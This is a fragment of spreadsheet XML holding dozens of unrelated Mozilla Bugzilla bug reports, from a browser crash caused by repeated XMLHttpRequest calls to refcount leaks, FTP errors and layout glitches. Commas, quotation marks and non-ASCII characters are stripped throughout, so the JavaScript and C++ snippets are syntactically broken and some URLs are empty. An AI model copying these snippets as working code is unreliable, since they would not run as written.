    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4b) Gecko/20030521
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4b) Gecko/20030521
XMLHttpRequest crashes the browser on approx 500th call this number is
cumulative i.e. if call made 300 times then the window closed and the page is
opened in another the browser will crash after ~200 calls.
The same effect in Mozilla on Linux and Windows. On Windows it also says there's
a problem in XPCOM library.
Reproducible: Always
Steps to Reproduce:
1.open the page test.html 
2.wait until counter gets to ~500
Actual Results:  
browser crashes
Expected Results:  
browser should keep working
this bug does not depend on setTimeout() - with for() loop it gives the same
crash and this bug does not depend on setting innerHTML of the element.
var count = 0
var xml = null
if(document.all)
 xml = new ActiveXObject('Microsoft.XMLHTTP')
else
 xml = new XMLHttpRequest()
function changeSize(){
xml.open(GET about:blank false)
   xml.send(null)
   document.getElementById(count).innerHTML = eval(++count)
   setTimeout(changeSize() 50)
}
Count: 0
</t>
  </si>
  <si>
    <t>keeda</t>
  </si>
  <si>
    <t>CORE-514112</t>
  </si>
  <si>
    <t>MAX_DSLOTS_LENGTH is *net* and avoid *size variable names for net lengths or capacities</t>
  </si>
  <si>
    <t>With gcc -Wtype-limits:
/home/karl/moz/dev/js/src/jsarray.cpp: In function 'JSBool ResizeSlots(JSContext* JSObject* uint32 uint32)':
/home/karl/moz/dev/js/src/jsarray.cpp:327: warning: comparison is always false due to limited range of data type
If size == ~(uint32)0 size + 1 will overflow and if realloc(ptr 0) chooses
to return non-NULL the overflow will not be detected.</t>
  </si>
  <si>
    <t>CORE-74229</t>
  </si>
  <si>
    <t>Networking: FTP</t>
  </si>
  <si>
    <t>No error message given when connecting to full FTP site (421)</t>
  </si>
  <si>
    <t>Build 2001032921 Linux 2.4.3 i686 RedHat 6.1 XFree86 4.0.2
When I was attempting to connect to an FTP site that already had the
maximum number of users Mozilla failed silently in the GUI.  The command
line output showed:
Error loading URL ftp://ftp.kde.org/pub/kde/unstable/CVS/snapshots/current/:
804b0002 
while a CLI ftp showed:
Connected to max.tat.physik.uni-tuebingen.de.
421 60 users (the maximum) are already logged in</t>
  </si>
  <si>
    <t>NSS-303010</t>
  </si>
  <si>
    <t>Certificate upgrade can drop S/MIME certificates.</t>
  </si>
  <si>
    <t>When going from cert7 to cert8 or from cert8 to rdb S/MIME certificates are
sometimes dropped. That is because the upgrade is handled by only reconstructing
the certs and s/mime records. If the S/Mime record is encountered before the
corresponding certificate then the S/MIME record is lost.
The solution is to loop through the update twice grabbing the certificates
first then the S/MIME records.</t>
  </si>
  <si>
    <t>CORE-355156</t>
  </si>
  <si>
    <t>Mixed-direction IDNs display as Punycode.</t>
  </si>
  <si>
    <t>Mixed-direction IDNs such as http://.idntest/ display as Punycode in the UI even when IDN is enabled for the (testing-only) .idntest TLD. 
Other IDNs containing mixed scripts display as intended. Examples: http://.idntest/ http://.idntest/
Mixed-direction IDNs should probably be able to be displayed in their native scripts unless there are significant unresolved BiDi or security issues related to displaying URLs etc containing mixed scripts in the UI.
Note: The special case of the display of domain names right-to-left labels in the TLDs themselves should be considered carefully here before enabling this.</t>
  </si>
  <si>
    <t>usenet</t>
  </si>
  <si>
    <t>CORE-242594</t>
  </si>
  <si>
    <t>Nodeless text frames for ordered list item ordinals not exposed</t>
  </si>
  <si>
    <t>Steps:
1. Open http://www.corecss.com/examples/15-02-list-style-type_css1-values.html
2. Run accessibility test tool
What happens:
The text before the period numbering each list item is not exposed
Related:
We probably don't expose text in :before and :after
Let's make sure both things work.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-402062</t>
  </si>
  <si>
    <t>Self-hosting compiler (ESC)</t>
  </si>
  <si>
    <t>Patch to change esc to use callproperty instead of getprop/call</t>
  </si>
  <si>
    <t>Created attachment 286973
Patch to change esc to use callproperty instead of getprop/call
This patch fixes esc's cogen to emit findproperty/callproperty for method calls instead of findproperty/getproperty/call.  The previous method wasn't always correct and callproperty is faster anyways.</t>
  </si>
  <si>
    <t>tierney</t>
  </si>
  <si>
    <t>FIREFOX-233461</t>
  </si>
  <si>
    <t>[GNOME] use of stock images</t>
  </si>
  <si>
    <t>The stock images are the icons that are shared between gtk applications. They
usually come with a label a direction (ltrrtl). But this bug is likely to only
cover the use of stock images in our dialog buttons.</t>
  </si>
  <si>
    <t>p_ch</t>
  </si>
  <si>
    <t>TOOLKIT-439365</t>
  </si>
  <si>
    <t>need a notification to fire when a form is available to be filled in</t>
  </si>
  <si>
    <t>Bug 359675 is introducing an login manger API which allows other code to request an HTML login form to be filled in. That's sufficient to implement an extension which provides say a toolbar button that fills in form(s) on the page when clicked.
But just that is a little clunky ideally there should be a way to only show the button when the login manager found an eligible login form but did *not* automatically fill it in. Then an extension could only expose its UI when it's actually needed.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-335296</t>
  </si>
  <si>
    <t>Give tinderbox client the ability to start building xulrunner+firefox</t>
  </si>
  <si>
    <t>This is a first step: currently all of the tests and bit-shipping must be disabled in tinder-config but it at least produces a green tree that builds correctly.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-159843</t>
  </si>
  <si>
    <t>Toolbars &amp; Menus</t>
  </si>
  <si>
    <t>User isn't prompted when deleting a bookmark/folder from Bookmark toolbar menu</t>
  </si>
  <si>
    <t>Build: 2002-07-27-05
Platform: OS X 10.1.5
Expected Results: Deleting a bookmark from bookmark toolbar should prompt user
What I got: Bookmark is deleted
Steps to reproduce:
1) Control - click on a bookmark display on the bookmark toolbar.
2) Contextual menu appears.
3) Select Delete.
4) Bookmark is removed with alert prompt.</t>
  </si>
  <si>
    <t>chrispetersen</t>
  </si>
  <si>
    <t>CORE-75504</t>
  </si>
  <si>
    <t>|dont_AddRef| surprise</t>
  </si>
  <si>
    <t>Please read and vend some clues on the issues in the mail thread dont_AddRef
wierdness in your inbox.
The refcounting weirdness is one issue we care about. The question of *why* the
form of the code without the refcounting problem does not build on Mac is
another issue.
Your help would be much appreciated.
Thanks
John.
.........................................................................
Subject: Re: dont_AddRef wierdness?
Date: Tue 10 Apr 2001 21:06:47 -0700
From: John Bandhauer 
Organization: minions of mozilla
To: Scott Collins  Johnny Stenback 
    Peter Van der Beken 
References: 1  2  3  4  5
So... Stepping through this in the debugger I see...
case 1...
nsCOMPtr wrapper(dont_AddRef(
    XPCWrappedNative::GetNewOrUsed(ccx cholder aScope iface nsnull)))
This works right. It goes through...
const already_AddRefed
dont_AddRef( T* aRawPtr )
...and... uses the nsCOMPtr ctor:
nsCOMPtr( const already_AddRefed&amp; aSmartPtr )
(where 'T' is XPCWrappedNative).
case 2...
nsCOMPtr wrapper(dont_AddRef(
    XPCWrappedNative::GetNewOrUsed(ccx cholder aScope iface nsnull)))
This does *not* work as expected. It goes through...
const already_AddRefed
dont_AddRef( T* aRawPtr )
...but.. uses the nsCOMPtr ctor:
nsCOMPtr( T* aRawPtr )
So that an *extra* reference is silently added.
I assume it is doing this because the dont_AddRef it typed as 'XPCNativeWrapper' 
but the nsCOMPtr is typed to a class that is a base class of that class but
not an exact match.
Is this something that will only bite in the case where we are dealing with
a return value? If it did this with getter_AddRefs and 'out' pointer then we 
would be in much pain.
Nevertheless this is not pretty.
Especially bad since we are still without understanding why case 1 will not
even build on Mac (when the nsCOMPtr is actually used).
Any insight anyone?
John.  
John Bandhauer wrote:
&gt; 
&gt; Hey! Didn't *anyone* see my message below???
&gt; 
&gt; scc: no comment? This is a completely heinous bug. Is this a
&gt; known problem? Fixed on the trunk? Any idea?
&gt; 
&gt; peterv: I just spent five minutes trying to figure out how my
&gt; recent changes could have caused a ton of leaks to spring up and
&gt; then I realized that you must have checked in the change despite
&gt; my message here that this causes a refcount misbalance.
&gt; I'm going to change this back to a nsCOMPtr in
&gt; the tree for now. You can change it locally on your machine and
&gt; let it leak there until we puzzle this out. OK?
&gt; 
&gt; scc: Besides the refcount craziness can you vend a clue on why
&gt; peterv would see Mac build failure with
&gt; nsCOMPtr (given the inheritance below)?
&gt; 
&gt; Thanks
&gt; 
&gt; John.
&gt; 
&gt; John Bandhauer wrote:
&gt; &gt;
&gt; &gt; OK now I'm worried.
&gt; &gt;
&gt; &gt; It looks to me like nsCOMPtr and/or dont_AddRef is not doing the
&gt; &gt; right thing on XPCDOM_20010329_BRANCH.
&gt; &gt;
&gt; &gt; In the patch below I end up with an extra (leaked) reference.
&gt; &gt; after changing the type of the nsCOMPtr from the concrete type
&gt; &gt; to an abstract base type.
&gt; &gt;
&gt; &gt; I have an inheritance chain like:
&gt; &gt;
&gt; &gt; // in idl
&gt; &gt; interface nsIXPConnectJSObjectHolder : nsISupports
&gt; &gt; interface nsIXPConnectWrappedNative : nsIXPConnectJSObjectHolder
&gt; &gt;
&gt; &gt; // in C++
&gt; &gt; class XPCWrappedNative : public nsIXPConnectWrappedNative
&gt; &gt;
&gt; &gt; The static method XPCWrappedNative::GetNewOrUsed returns a
&gt; &gt; pointer to a XPCWrappedNative that has been addref'd.
&gt; &gt;
&gt; &gt; This code...
&gt; &gt;
&gt; &gt;   nsCOMPtr wrapper(dont_AddRef(
&gt; &gt;      XPCWrappedNative::GetNewOrUsed(ccx cholder aScope iface nsnull)))
&gt; &gt;
&gt; &gt; ...or this code...
&gt; &gt;
&gt; &gt;   nsCOMPtr wrapper(dont_AddRef(
&gt; &gt;      XPCWrappedNative::GetNewOrUsed(ccx cholder aScope iface nsnull)))
&gt; &gt;
&gt; &gt; ...will addref wrapper one more time than...
&gt; &gt;
&gt; &gt;   nsCOMPtr wrapper(dont_AddRef(
&gt; &gt;      XPCWrappedNative::GetNewOrUsed(ccx cholder aScope iface nsnull)))
&gt; &gt;
&gt; &gt; The only thing different is the type of the nsCOMPtr
&gt; &gt;
&gt; &gt; This is in a debug build.
&gt; &gt;
&gt; &gt; The object's QI map looks like:
&gt; &gt;
&gt; &gt; NS_INTERFACE_MAP_BEGIN(XPCWrappedNative)
&gt; &gt;   NS_INTERFACE_MAP_ENTRY(nsIXPConnectWrappedNative)
&gt; &gt;   NS_INTERFACE_MAP_ENTRY(nsIXPConnectJSObjectHolder)
&gt; &gt;   NS_INTERFACE_MAP_ENTRY_AMBIGUOUS(nsISupports nsIXPConnectWrappedNative)
&gt; &gt; NS_INTERFACE_MAP_END_THREADSAFE
&gt; &gt;
&gt; &gt; This is really bad. Is this a known problem or what?
&gt; &gt;
&gt; &gt; Thanks
&gt; &gt;
&gt; &gt; John.
&gt; &gt;
&gt; &gt; &gt;   -----------------------------------------------------------------
&gt; &gt; &gt; Index: xpccomponents.cpp
&gt; &gt; &gt; ===================================================================
&gt; &gt; &gt; RCS file: /cvsroot/mozilla/js/src/xpconnect/src/xpccomponents.cppv
&gt; &gt; &gt; retrieving revision 1.37.2.1
&gt; &gt; &gt; diff -u -r1.37.2.1 xpccomponents.cpp
&gt; &gt; &gt; --- xpccomponents.cpp   2001/03/31 07:17:44     1.37.2.1
&gt; &gt; &gt; +++ xpccomponents.cpp   2001/04/06 05:23:45
&gt; &gt; &gt; @@ -16807 +16807 @@
&gt; &gt; &gt;      if(!iface)
&gt; &gt; &gt;          return JS_FALSE
&gt; &gt; &gt;
&gt; &gt; &gt; -    nsCOMPtr wrapper(dont_AddRef(
&gt; &gt; &gt; +    nsCOMPtr wrapper(dont_AddRef(
&gt; &gt; &gt;          XPCWrappedNative::GetNewOrUsed(ccx cholder aScope iface
nsnull)))
&gt; &gt; &gt;      if(!wrapper)
&gt; &gt; &gt;          return JS_FALSE
&gt; &gt; &gt; @@ -16889 +168810 @@
&gt; &gt; &gt;      aScope-&gt;SetComponents(components)
&gt; &gt; &gt;
&gt; &gt; &gt;      jsid id = ccx.GetRuntime()-&gt;GetStringID(XPCJSRuntime::IDX_COMPONENTS)
&gt; &gt; &gt; -    JSObject* obj = wrapper-&gt;GetFlatJSObject()
&gt; &gt; &gt; +    JSObject* obj
&gt; &gt; &gt;
&gt; &gt; &gt; -    return obj &amp;&amp; OBJ_DEFINE_PROPERTY(ccx
&gt; &gt; &gt; +    return NS_SUCCEEDED(wrapper-&gt;GetJSObject(&amp;obj)) &amp;&amp;
&gt; &gt; &gt; +           obj &amp;&amp; OBJ_DEFINE_PROPERTY(ccx
&gt; &gt; &gt;                                        aGlobal id OBJECT_TO_JSVAL(obj)
&gt; &gt; &gt;                                        nsnull nsnull
&gt; &gt; &gt;                                        JSPROP_PERMANENT | JSPROP_READONLY</t>
  </si>
  <si>
    <t>scc</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-488380</t>
  </si>
  <si>
    <t>10 more mac minis for talos try</t>
  </si>
  <si>
    <t>to be:
qm-pleopard-try03
qm-pleopard-try04
qm-pvista-try03
qm-pvista-try04
qm-pxp-try03
qm-pxp-try04
qm-ptiger-try03
qm-ptiger-try04
qm-pubuntu-try03
qm-pubuntu-try04
Phong - how many minis do we have left unracked?</t>
  </si>
  <si>
    <t>CORE-529996</t>
  </si>
  <si>
    <t>Provide notification when embed/object elements are created/destroyed/resized</t>
  </si>
  <si>
    <t>In order to support Fennec fast plugins - see bug 528551 - the front end code needs to position embed and object elements.  Currently the Fennec code is doing some funky stuff to find all such elements on the page.  Ideally the front end would just get a notification when a new embed or object element is created when one is removed or when one is resized.</t>
  </si>
  <si>
    <t>BUGZILLA-652474</t>
  </si>
  <si>
    <t>Release Bugzilla 4.1.2 4.0.1 3.6.5 and 3.4.11</t>
  </si>
  <si>
    <t>We have some valuable bug fixes in at least 3.6.5 and 4.0.1. Also 3.4.11 is affected by installation problems with Math::Random::Secure. And there are several new checkins on trunk since we released 4.1.1. So we should release soon.</t>
  </si>
  <si>
    <t>BUGZILLA-427471</t>
  </si>
  <si>
    <t>Add foreign key constraints for components table</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.10) Gecko/20070510 Fedora/1.5.0.10-6.fc6 Firefox/1.5.0.10
Build Identifier: 
Add foreign key information for components table in Bugzilla/DB/Schema.pm file.
Reproducible: Always</t>
  </si>
  <si>
    <t>tfu</t>
  </si>
  <si>
    <t>CORE-414558</t>
  </si>
  <si>
    <t>gmail titles shown below label when browser width is reduced</t>
  </si>
  <si>
    <t>Created attachment 300009
screenshot showing problem
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b3pre) Gecko/2008012904 Minefield/3.0b3pre ID:2008012904
1. new profile start firefox
2. log into gmail
3. reduce the width of the browser window
Expected
- your email titles should always remain on one line next to the label
Actual:
- label is shown on one line and email title shown below it
Works 20080128_2340_firefox-3.0b3pre.en-US.win32
Broken 20080129_0018_firefox-3.0b3pre.en-US.win32
Checkins to module PhoenixTinderbox between 2008-01-28 23:40 and 2008-01-29 00:17 : 
http://bonsai.mozilla.org/cvsquery.cgi?module=PhoenixTinderbox&amp;date=explicit&amp;mindate=1201592400&amp;maxdate=1201594679
Caused by bug 134706 I think</t>
  </si>
  <si>
    <t>steve.england</t>
  </si>
  <si>
    <t>SEAMONKEY-118187</t>
  </si>
  <si>
    <t>Remove use of PR_PutEnv since it's deprecated</t>
  </si>
  <si>
    <t>We still use PR_PutEnv on mac in a few places but NSPR has deprecated it (and
all it does it call PR_SetEnv anyways).
Here are the places it's still referenced:
  http://lxr.mozilla.org/seamonkey/ident?i=PR_PutEnv
I'll attach a patch.</t>
  </si>
  <si>
    <t>CORE-113232</t>
  </si>
  <si>
    <t>support transparent non-rectangular chrome windows</t>
  </si>
  <si>
    <t>will the  element  support background-color:transparent allowing the 
desktop to be revealed?
It a couple of years since I originally raised this in the newsgroups and 
altough there seems enthusiasm for this Im not sure if it is possible to 
implement.
The idea is that if a window background-color is transparent and background is 
set to a gif with transparent regions then the desktop will be visible through 
the transparent regions  e.g. an artists palette
Or is there another solution that would allow the design of irregular (non-
rectangular) windows.????</t>
  </si>
  <si>
    <t>rvj</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-182367</t>
  </si>
  <si>
    <t>Portuguese</t>
  </si>
  <si>
    <t>Mozilla shows HTML code instead of render the page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2) Gecko/20021126
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2) Gecko/20021126
This URL:
http://olinux.uol.com.br/news/open_news.phl?id=6600
does not render but instead Mozilla 1.2-final shows its HTML code! All other
browsers work fine.
Screenshot here of what happens:
http://www.eugenia.co.uk/images/mozilla.jpg
Reproducible: Always
Steps to Reproduce:
1. just go to that url with Mozilla 1.2.
2.
3.
Actual Results:  
http://www.eugenia.co.uk/images/mozilla.jpg
Expected Results:  
To actually render...</t>
  </si>
  <si>
    <t>portuguese</t>
  </si>
  <si>
    <t>SEAMONKEY-276060</t>
  </si>
  <si>
    <t>security info icon should use oncommand instead of onclick</t>
  </si>
  <si>
    <t>The security info icon in the status bar shouldn't pop up a dialog when you
right-click it.  Patch in a moment.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-184182</t>
  </si>
  <si>
    <t>configure test needed for File::Spec v 0.8</t>
  </si>
  <si>
    <t>I just spent a while (an hour or so at least) building the current phoenix
source.  Then as chrome was being archived:
updating: skin/classic/global/toolbarbutton.css (deflated 79%)
updating: skin/classic/global/button.css (deflated 71%)
gmake[4]: Leaving directory `/home/bzbarsky/phoenix_src/mozilla/toolkit/skin/unix'
Unknown option: -
+++ making chrome /home/bzbarsky/phoenix_src/mozilla/toolkit  =&gt;
../dist/bin/chrome/toolkit.jar
File::Spec version 0.8 required--this is only version 0.6 at
../config/preprocessor.pl line 74.
BEGIN failed--compilation aborted at ../config/preprocessor.pl line 74.
Preprocessing of content/viewZoomOverlay.js failed: 255 at
../config/make-jars.pl line 340  chunk 2.
gmake[3]: *** [libs] Error 2
It would really help to do this check _before_ the compile starts.</t>
  </si>
  <si>
    <t>CORE-424018</t>
  </si>
  <si>
    <t>3% Ts Regression on 3-18</t>
  </si>
  <si>
    <t>http://graphs.mozilla.org/#spst=range&amp;spss=1205888132.1105528&amp;spse=1205906163.6180904&amp;spstart=1205452800&amp;spend=1205965410&amp;bpst=Cursor&amp;bpstart=1205888132.1105528&amp;bpend=1205906163.6180904&amp;m1tid=53216&amp;m1bl=0&amp;m1avg=0&amp;m2tid=53252&amp;m2bl=0&amp;m2avg=0&amp;m3tid=53234&amp;m3bl=0&amp;m3avg=0&amp;m4tid=53274&amp;m4bl=0&amp;m4avg=0
Checkins during this time:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=PhoenixTinderbox&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;cvsroot=%2Fcvsroot&amp;mindate=1205888132&amp;maxdate=1205906164
Bug 423674?</t>
  </si>
  <si>
    <t>mtschrep</t>
  </si>
  <si>
    <t>BUGZILLA-313744</t>
  </si>
  <si>
    <t>Deadline Field not available when changing several bugs at once</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
The deadline field is not available for editing when changing several fields at once. It would be nice to have available to edit for a set of bugs so that we can more easily set schedules for bugfixes.
Reproducible: Always
Steps to Reproduce:
1.Perform a search.
2.Click on Change several bugs at once
3.Note that there is no deadline field.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-270061</t>
  </si>
  <si>
    <t>Create bugzilla component for XTF</t>
  </si>
  <si>
    <t>Create bugzilla component for XTF
http://lxr.mozilla.org/mozilla/source/content/xtf/
Name:              XTF
Description:       eXtensible Tag Framework
Default Assignee:  alex@croczilla.com
Default QA:        core.xtf@bugs
I'm not picky about the Default Assignee or QA.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-330531</t>
  </si>
  <si>
    <t>remove HAVE_SEARCH_PORT</t>
  </si>
  <si>
    <t>HAVE_SEARCH_PORT has been dead for many years can we just kill it?</t>
  </si>
  <si>
    <t>CORE-970542</t>
  </si>
  <si>
    <t>Decode and verify name constraints in mozilla::pkix internally (without relying on NSS to do all the work)</t>
  </si>
  <si>
    <t>Probably blocks bug 926265.</t>
  </si>
  <si>
    <t>FIREFOX-498832</t>
  </si>
  <si>
    <t>Some default toolbar buttons appear larger than others on Windows</t>
  </si>
  <si>
    <t>Created attachment 383636
Screenshot on Windows XP
When executing litmus test 5984 I encountered a polish issue on Windows with the toolbar button sizes.  After creating a new toolbar and adding a new button (ie. new tab) to it the height of the toolbar increases so much so that the buttons added to it are larger than the buttons on the navigation toolbar.</t>
  </si>
  <si>
    <t>MattN+bmo</t>
  </si>
  <si>
    <t>BUGZILLA-261993</t>
  </si>
  <si>
    <t>rampant uninitialized value error in log with fix for bug 255512</t>
  </si>
  <si>
    <t>Ever since the fix for bug 255512 was checked in and landfill's tip install
upgraded to it landfill's httpd error log has been bombarded with the following
error:
[Thu Sep 23 13:30:16 2004] [error] [client 67.109.126.2] [Thu Sep 23 13:30:16
2004] buglist.cgi: Use of uninitialized value in numeric eq (==) at
/var/www/html/bugzilla-tip/buglist.cgi line 842. referer:
http://landfill.bugzilla.org/bugzilla-tip/query.cgi
It's bad enough to have taken about 90MB of space on disk before I discovered it
today.  Since Sunday morning (two and a half days ago) 173K of 174K lines in
the log are that error.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-358526</t>
  </si>
  <si>
    <t>Location Bar &amp; Autocomplete</t>
  </si>
  <si>
    <t>Tab chain is not hooked up in search sheet</t>
  </si>
  <si>
    <t>The nextKeyViews aren't hooked up properly in BrowserWindow.nib for the search sheet (the one that gets triggered if your toolbar or search field is hidden and you hit Command-Shift-F). Fixed nib coming.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-370161</t>
  </si>
  <si>
    <t>CVS commit author being shown as different user than actual committer for mfinkle@mozilla.com</t>
  </si>
  <si>
    <t>Any code that I (mark finkle) check into CVS seems to be tagged as morgamic%mozilla.com
I am using the FUEL_DEVEL_BRANCH. You can look at the log of browser/fuel/src/nsApplication.js as an example.
To my knowledge morgamic has not touched any of those files.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-191559</t>
  </si>
  <si>
    <t>friscoisd.org - Cascading menus display on IE not Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.0.0) Gecko/20020602
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.0.0) Gecko/20020602
When you visit this page with IE this page has a set of menus down the left
side of the page some of which cascade on mouseover.  The menu bar at the top of
the page also displays submenus on mouseover.  Using Mozilla the menu at left
does not appear and neither do the submenus off the menu bar.  I have tried this
on OS/2 and Windows 2000.  I browsed the page source using IE but could not find
the code which creates the menus.
Reproducible: Always
Steps to Reproduce:
1. Visit the page with Mozilla.
2. Visit the page with Internet Explorer.
3. Note the differences in menus.
Actual Results:  
The menus did not display.
Expected Results:  
Display the menus.</t>
  </si>
  <si>
    <t>gmeazell</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-382653</t>
  </si>
  <si>
    <t>Add option to automatically open a mailbox when it receives new mail.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en) AppleWebKit/419 (KHTML like Gecko) Safari/419.3
Build Identifier: 0.1a19
In Eudora I had it configured to open a Mailbox window when that Mailbox received new mail (either directly or via a filter).
That feature is missing on Penelope.  (Since the Eudora import marks everything as new it is even more useful to actually have a way to identify a mailbox which has just received some new mail vs one which just has unread messages)
Reproducible: Always</t>
  </si>
  <si>
    <t>beckley</t>
  </si>
  <si>
    <t>CORE-97235</t>
  </si>
  <si>
    <t>Extended Arabic letters do not join</t>
  </si>
  <si>
    <t>Extended Arabic letters (in the range U+0670..U+06FF) do not join properly. For
those of these who have contextual shapes in the U+FB50..U+FBFF range the
support could be added with minor changes. This is important which languages
like Persian.</t>
  </si>
  <si>
    <t>THUNDERBIRD-495846</t>
  </si>
  <si>
    <t>view | folders sub-menu doesn't include smart folders</t>
  </si>
  <si>
    <t>Standard8 pointed out that the view | folders sub-menu doesn't include the new smart folders mode.</t>
  </si>
  <si>
    <t>CALENDAR-239431</t>
  </si>
  <si>
    <t>Allow choosing multiple exceptions more easily</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040211 Firefox/0.8
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040211 Firefox/0.8
Hi when you have more than one or two exceptions the current UI is no fun. For
example I want to specify an even that coocurs every day but a few times
during the month I have to add an exception. Doing it one date at a time is
slow and boring.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
I would like to be able to click more than one date in the calendar in order to
add exceptions in one fell swoop.</t>
  </si>
  <si>
    <t>mostafah</t>
  </si>
  <si>
    <t>lduperval</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-494845</t>
  </si>
  <si>
    <t>Need to restore our frozen button styles</t>
  </si>
  <si>
    <t>Apparently the frozen buttons didn't make it into amo2009.  The javascript is all there and the code is still there we just need the style to get added to amo2009.  If you grep for exp-loggedout you'll see what makes them do what they do.
Assigning to ryan because he can probably do this the fastest.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-393440</t>
  </si>
  <si>
    <t>Improve discoverability of QMO extension</t>
  </si>
  <si>
    <t>On first installing the extension I did not notice the QMO icon down in the bottom right corner of FFx until about 2 hours later (long after I gave up searching for it).
The very first thing I did was to go to Tools-&gt;AddOns and look for an extension preferences page thinking that this might give me some clue to how the extension loads/looks/modifies firefox.  I don't know if there is something we can do there to help users figure it out or not.
One thing we could do is change the default icon in the Add-Ons dialog to be the QMO icon then at least once the users see the QMO icon in the corner they will know what it is. Currently the icon in Tools-&gt;Add-Ons is the standard green puzzle piece.</t>
  </si>
  <si>
    <t>jaymoz</t>
  </si>
  <si>
    <t>cmtalbert</t>
  </si>
  <si>
    <t>CORE-124103</t>
  </si>
  <si>
    <t>[FIX]infinite loop during page load</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:0.9.8) Gecko/20020204
BuildID:    2002020406
If I try to load the page on URL http://support.bea.com/ the Browser trys to
load the page again and again with different parameters for the JSP behind the
URL. It works correct with Netscape 4.5 and older Mozillas
Reproducible: Always
Steps to Reproduce:
Go to http://support.bea.com/
Actual Results:  Mozilla trys to load the page again and again until You stop it.
Expected Results:  Display the page</t>
  </si>
  <si>
    <t>mzeibig</t>
  </si>
  <si>
    <t>CORE-203641</t>
  </si>
  <si>
    <t>Layout: Floats</t>
  </si>
  <si>
    <t>floats in lists don't respect clear property when borders are off</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3) Gecko/20030312
This page has a ul with three divs in each li: one floated left one floated
right and an empty one with clear: both to cause the block to fill to the
bottom. This works when the items are not in a list and it works when the items
have a border turned on but it does not work with no border in a list. The
elements are acting as they do with clear: none.
Reproducible: Always
Steps to Reproduce:
1.Load page
2.change border style to see that clear takes effect
3.change clear style to see original results match clear: none
Actual Results:  
The page renders incorrectly originally. The next two steps demonstrate how.
Expected Results:  
The clear property should have the same effect whether borders are on or off.</t>
  </si>
  <si>
    <t>layout.floats</t>
  </si>
  <si>
    <t>CORE-373756</t>
  </si>
  <si>
    <t>[FIX]crash at [@ nsCSSFrameConstructor::ConstructFrame] with Web Developer Toolbar and custom XPI</t>
  </si>
  <si>
    <t>TB30191020M TB30190957Y TB30190939W TB30186402G
Seems to be related to the Web Developer Toolbar. If I disable that Firefox
starts fine
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070312
Minefield/3.0a3pre ID:2007031204 [cairo]</t>
  </si>
  <si>
    <t>ADD-ON_SDK_GRAVEYARD-832401</t>
  </si>
  <si>
    <t>ADD-ON_SDK_GRAVEYARD</t>
  </si>
  <si>
    <t>Ghost Context menu item appears with specific set of add-ons installed</t>
  </si>
  <si>
    <t>Created attachment 703972
screenshuot of bug
To repro:
1. install Evernote clearly: https://addons.mozilla.org/en-US/firefox/addon/clearly/
2. install Agilebits 1Password: https://agilebits.com/extensions/mac/index.html ( this could perhaps be any SDK-based add-on that uses the old context-menu module )
3. install the attached add-on that is built with Mossop's new module including the fixes from bug 831643.
Result: a ghost / blank item appears in between the clearly item and the item from the attached xpi.</t>
  </si>
  <si>
    <t>jgriffiths</t>
  </si>
  <si>
    <t>NSS-231566</t>
  </si>
  <si>
    <t>pk12util erroneously reports error -8173 no memory</t>
  </si>
  <si>
    <t>Emil Assarsson had some trouble with pk12util.  He did some debugging and 
wrote:
&gt; I have a problem with some allocation errors in SEC_PKCS12AddCertAndKey(). 
&gt; I have the same error if I use SEC_PKCS12CreatePasswordPrivSafe().
&gt;
&gt; I get a return value != SECSuccess and the PR_GetError() is returning a 
&gt; -8173 (SEC_ERROR_NO_MEMORY). 
&gt; Is this related to the arena from the ExportContext? 
&gt; And what can I do about it? 
I looked into it and found several bugs in pk12util that cause wrong error
messages to be shown.  I also found several misnamed functions and found
that the Usage message was not being displayed when it should be.  
Patch forthcoming.</t>
  </si>
  <si>
    <t>CORE-167758</t>
  </si>
  <si>
    <t>Cell padding too large with small fonts</t>
